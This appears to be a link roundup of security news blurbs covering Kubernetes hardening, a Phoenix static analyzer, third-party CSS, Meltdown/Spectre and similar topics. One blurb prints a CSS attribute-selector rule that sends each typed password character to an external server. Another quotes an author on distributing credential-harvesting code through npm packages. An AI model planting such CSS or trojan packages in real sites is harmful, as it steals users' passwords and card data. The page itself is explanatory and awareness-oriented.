Security

InfoSec, DevSec, Penetration Testing, etc.

github.com

A best practice guide to Kubernetes security

K8s is a powerful platform which can be abused in many ways if not configured properly. Contributors to this guide are running Kubernetes in production and worked on several K8s projects to learn about security flaws the hard way. This guide scores major points for having battle-hardened contributors. I also dig how they indicate the severity/importance of each topic with an emoji. Look out for the 💥s!


github.com

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he'd found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he'd be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that's what he did and that's what I'm doing! 💚


jakearchibald.com

Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'. Jake shared many examples as well as ways to mitigate these types of attacks.


github.com

CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates the input's value attribute on every keypress. Here's how it works: using CSS attribute selectors, one can request resources from an external server under the premise of loading a background image. Add some CSS that looks like this:

input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }

When the user types an "a" into the password field, the browser will hit your server for logging. Dastardly!


motherboard.vice.com

Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called "the biggest leak in history", which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it's likely the biggest leak in Apple software history. Motherboard says it... could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That's plausible. iBoot is responsible for ensuring a trusted boot of the OS. The specific version posted was from iOS 9, but this portion of code probably doesn't get updated as often as the Music app, so it's likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all too well that once source code is made public, there's no taking it private again.


www.rdegges.com

Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tl;dr: don't use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.


Medium

Meltdown and Spectre Explained

If some or most of what you've heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share diagrams of CPUs and virtual memory, plus code samples, to break down the exploit.


spectreattack.com

Meltdown and Spectre

Everything you need to know about the Meltdown and Spectre bug. Q: Am I affected by the bug? A: Most certainly, yes. Q: Can I detect if someone has exploited Meltdown or Spectre against me? A: Probably not. The exploitation does not leave any traces in traditional log files. Q: Which systems are affected by Meltdown? A: Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995. Uh oh. 😱


Hackernoon

I'm harvesting credit card numbers and passwords from your site. Here's how.

This is pretty scary regardless of whether it's based on a true story. When I first wrote this code back in 2015, it was of no use at all sitting on my computer. I needed to get it out into the world. Out into your site. Lucky for me, we live in an age where people install npm packages like they’re popping pain killers. So, npm was to be my distribution method. I would need to come up with some borderline-useful package that people would install without thinking — my Trojan horse. Oh and then there was this — this is an excellent opportunity for taking over npm packages and injecting malware by malicious people.
